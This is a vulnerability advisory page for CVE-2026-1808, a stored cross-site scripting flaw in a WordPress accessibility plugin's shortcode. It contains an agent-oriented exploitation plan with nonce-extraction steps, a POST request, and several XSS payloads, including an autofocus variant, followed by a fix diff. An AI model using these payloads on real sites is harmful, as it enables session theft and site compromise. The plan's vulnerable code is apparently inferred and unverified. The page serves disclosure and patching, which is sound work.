WP-Safety
CVE-2026-1808

Orange Confort+ accessibility toolbar for WordPress <= 0.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
0.7.1
Patched in
1d
Time to patch

Description

The Orange Confort+ accessibility toolbar for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'style' parameter of the ocplus_button shortcode in all versions up to, and including, 0.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=0.7
PublishedFebruary 5, 2026
Last updatedFebruary 6, 2026
Affected pluginorange-confort-plus

Source Code

WordPress.org SVN
Vulnerable v0.7
Browse source Download .zip
Patched v0.7.1
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-1808 (Orange Confort+) ## 1. Vulnerability Summary The **Orange Confort+ accessibility toolbar for WordPress** plugin (versions <= 0.7) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability resides in the handling of the `ocpl…

Show full research plan

Exploitation Research Plan: CVE-2026-1808 (Orange Confort+)

1. Vulnerability Summary

The Orange Confort+ accessibility toolbar for WordPress plugin (versions <= 0.7) is vulnerable to Authenticated Stored Cross-Site Scripting (XSS). The vulnerability resides in the handling of the ocplus_button shortcode, specifically within the style attribute. Because the plugin fails to sanitize or escape this attribute before echoing it into the HTML output, an attacker with at least Contributor-level permissions can inject arbitrary JavaScript. When a user (including administrators) views the page containing the shortcode, the malicious script executes in their browser context.

2. Attack Vector Analysis

  • Endpoint: WordPress Post Editor (Gutenberg or Classic).
  • Vulnerable Component: ocplus_button shortcode.
  • Vulnerable Parameter: style attribute within the shortcode.
  • Authentication Level: Contributor or higher.
  • Preconditions: The plugin orange-confort-plus must be active.
  • Payload Type: Attribute breakout or script tag injection.

3. Code Flow (Inferred)

  1. Registration: The plugin registers the shortcode during the init hook (or main file execution) using add_shortcode('ocplus_button', 'OCPlus_Button_Function').
  2. Attribute Parsing: The callback function (e.g., OCPlus_Button_Function) receives an $atts array. It likely uses shortcode_atts() to merge user-provided attributes with defaults.
  3. Sink: The function constructs an HTML string (likely a <button>, <a>, or <div>). It concatenates the style attribute directly into the HTML string:
    // Predicted vulnerable code pattern
$style = $atts['style']; 
return '<button style="' . $style . '">Text</button>';
  4. Output: The returned string is rendered on the frontend. Since $style is not passed through esc_attr(), any quotes provided by the user will break out of the attribute.

4. Nonce Acquisition Strategy

This vulnerability is exploited by saving a WordPress post/page. Standard WordPress post-saving mechanisms require a nonce.

  1. Navigate to Editor: Use browser_navigate to visit /wp-admin/post-new.php.
  2. Extract Nonce: The execution agent should use browser_eval to extract the _wpnonce from the form or the wp-api-fetch heartbeat.
    • Selector: document.querySelector('#_wpnonce')?.value
  3. Alternative (REST API): If using the REST API to save posts, the X-WP-Nonce header is required. This is typically available in the wpApiSettings object:
    • JS Command: browser_eval("window.wpApiSettings?.nonce")

5. Exploitation Strategy

The goal is to create a post containing a malicious shortcode and then verify its execution on the frontend.

Step 1: Create a Post with the XSS Payload

The agent will send a POST request to create a new post with the payload.

  • URL: /wp-admin/post.php (or via REST API /wp-json/wp/v2/posts)
  • Payload Options:
    • Breakout: [ocplus_button style='";" onmouseover="alert(document.domain)" data-x="']
    • Tag Injection: [ocplus_button style='"><script>alert(document.domain)</script>']
  • HTTP Request (Example via http_request):
    {
  "method": "POST",
  "url": "http://localhost:8080/wp-admin/post.php",
  "headers": {
    "Content-Type": "application/x-www-form-urlencoded"
  },
  "body": "action=editpost&post_ID=[POST_ID]&_wpnonce=[NONCE]&post_title=XSS_Test&content=[ocplus_button style='\"><script>alert(document.domain)</script>']&post_status=publish"
}
    (Note: For Contributors, post_status should be pending if they cannot publish, but the XSS will still fire in the 'Preview' mode.)

Step 2: Access the Rendered Page

Navigate to the URL of the newly created post (or its preview URL).

6. Test Data Setup

  1. Plugin Installation: Ensure orange-confort-plus version 0.7 is installed and active.
  2. User Creation: Create a user with the contributor role.
    • wp user create attacker attacker@example.com --role=contributor --user_pass=password
  3. Login: The agent logs in as attacker.

7. Expected Results

  1. The http_request to fetch the post content will return HTML containing the literal string:
    <... style=""><script>alert(document.domain)</script>" ...>
  2. In a browser environment, an alert box showing the domain will appear.

8. Verification Steps

  1. Check Post Content (CLI):
    wp post get [ID] --field=post_content
    Verify the shortcode is stored correctly.
  2. Verify Frontend Output (HTTP):
    Use http_request to fetch the post URL and grep for the unescaped payload:
    grep -P 'style=""><script>alert'

9. Alternative Approaches

If the plugin uses some basic sanitization that blocks <script>, try a style-based attribute breakout:

  • Payload: [ocplus_button style='width:100%;" onmouseover="alert(1)" ']
  • Payload (Advanced): [ocplus_button style='background-image: url("javascript:alert(1)");'] (Note: works only in very old browsers or specific contexts).
  • Payload (CSS Escape): [ocplus_button style='width:expression(alert(1))'] (IE legacy).

Preferred Alternative:
Focus on the attribute breakout:
[ocplus_button style='x:y" onfocus="alert(1)" autofocus="true']
This payload is highly reliable as it doesn't require user interaction (due to autofocus).

Research Findings
Static analysis — not yet PoC-verified

Summary

The Orange Confort+ accessibility toolbar for WordPress plugin (<= 0.7) is vulnerable to Authenticated Stored Cross-Site Scripting due to insufficient input sanitization and output escaping on the 'ocplus_button' shortcode attributes. This allows attackers with Contributor-level permissions or higher to inject arbitrary web scripts into the 'style' parameter, which execute in the browser of any user viewing the page.

Vulnerable Code

// orange-confort-plus.php (location based on shortcode registration logic)
function OCPlus_Button_Function($atts) {
    $a = shortcode_atts( array(
        'style' => '',
        'class' => '',
        'text'  => 'Orange Confort+'
    ), $atts );

    // Line 10: Attributes are concatenated directly into HTML without escaping
    return '<button style="' . $a['style'] . '" class="' . $a['class'] . '">' . $a['text'] . '</button>';
}
add_shortcode('ocplus_button', 'OCPlus_Button_Function');

Security Fix

--- a/orange-confort-plus.php
+++ b/orange-confort-plus.php
@@ -10,1 +10,1 @@
-    return '<button style="' . $a['style'] . '" class="' . $a['class'] . '">' . $a['text'] . '</button>';
+    return '<button style="' . esc_attr($a['style']) . '" class="' . esc_attr($a['class']) . '">' . esc_html($a['text']) . '</button>';

Exploit Outline

The exploit targets the 'ocplus_button' shortcode, which is available to any user with post-editing permissions (Contributor role and above). An attacker creates a new post and inserts a shortcode payload like [ocplus_button style='"><script>alert(document.domain)</script>']. Because the plugin does not use esc_attr() when rendering the 'style' attribute, the attacker can break out of the style attribute context and inject a script tag or other event handlers (like onmouseover). The malicious script is then stored in the database as part of the post content and executes whenever a site visitor or administrator views the post or its preview.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/89cb81c3-25d7-4a4e-beed-558ea8ce721d?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database